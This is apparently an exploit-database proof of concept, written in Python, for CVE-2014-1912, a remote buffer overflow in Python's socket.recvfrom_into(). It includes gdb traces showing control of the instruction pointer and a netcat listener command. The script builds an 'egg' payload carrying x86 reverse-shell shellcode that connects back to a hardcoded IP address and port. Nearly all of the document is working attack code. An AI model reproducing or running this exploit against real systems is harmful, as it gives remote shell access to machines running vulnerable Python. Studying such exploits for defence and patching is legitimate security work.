#!/usr/bin/env python
'''
# Exploit Title: python socket.recvfrom_into() remote buffer overflow
# Date: 21/02/2014
# Exploit Author: @sha0coder
# Vendor Homepage: python.org
# Version: python2.7 and python3
# Tested on: linux 32bit + python2.7
# CVE : CVE-2014-1912
socket.recvfrom_into() remote buffer overflow Proof of concept
by @sha0coder
TODO: rop to evade stack nx
(gdb) x/i $eip
=> 0x817bb28: mov eax,DWORD PTR [ebx+0x4] <--- ebx full control => eax full control
0x817bb2b: test BYTE PTR [eax+0x55],0x40
0x817bb2f: jne 0x817bb38 -->
...
0x817bb38: mov eax,DWORD PTR [eax+0xa4] <--- eax full control again
0x817bb3e: test eax,eax
0x817bb40: jne 0x817bb58 -->
...
0x817bb58: mov DWORD PTR [esp],ebx
0x817bb5b: call eax <--------------------- indirect fucktion call ;)
$ ./pyrecvfrominto.py
egg file generated
$ cat egg | nc -l 8080 -vv
... when the client connects ... or when we send the evil buffer to the server ...
0x0838591c in ?? ()
1: x/5i $eip
=> 0x838591c: int3 <--------- LANDED!!!!!
0x838591d: xor eax,eax
0x838591f: xor ebx,ebx
0x8385921: xor ecx,ecx
0x8385923: xor edx,edx
'''
import
struct
def off(o):
    """Return the integer *o* packed as a native-size, native-endian unsigned long.

    Thin wrapper around ``struct.pack('L', o)``; raises ``struct.error`` when
    *o* does not fit in the platform's unsigned long.
    """
    packed = struct.pack('L', o)
    return packed
reverseIP
=
'\xc0\xa8\x04\x34'
#'\xc0\xa8\x01\x0a'
reversePort
=
'\x7a\x69'
#shellcode from exploit-db.com, (remove the sigtrap)
shellcode
=
"\xcc\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
\
"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
\
"\x01\x6a\x02\x89\xe1\xcd\x80\x89"
\
"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
+
\
reverseIP
+
"\x66\x68"
+
reversePort
+
"\x66\x53\xfe"
\
"\xc3\x89\xe1\x6a\x10\x51\x56\x89"
\
"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
\
"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
\
"\xc0\x52\x68\x6e\x2f\x73\x68\x68"
\
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
\
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
\
"\x80"
shellcode_sz
=
len
(shellcode)
print
'shellcode sz %d'
%
shellcode_sz
ebx
=
0x08385908
sc_off
=
0x08385908
+
20
padd
=
'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM'
'''
+------------+----------------------+ +--------------------+
| | | | |
V | | V |
'''
buff
=
'aaaa'
+
off(ebx)
+
'aaaaaAAA'
+
off(ebx)
+
shellcode
+
padd
+
off(sc_off)
# .. and landed ;)
print
'buff sz: %s'
%
len
(buff)
open
(
'egg'
,
'w'
).write(buff)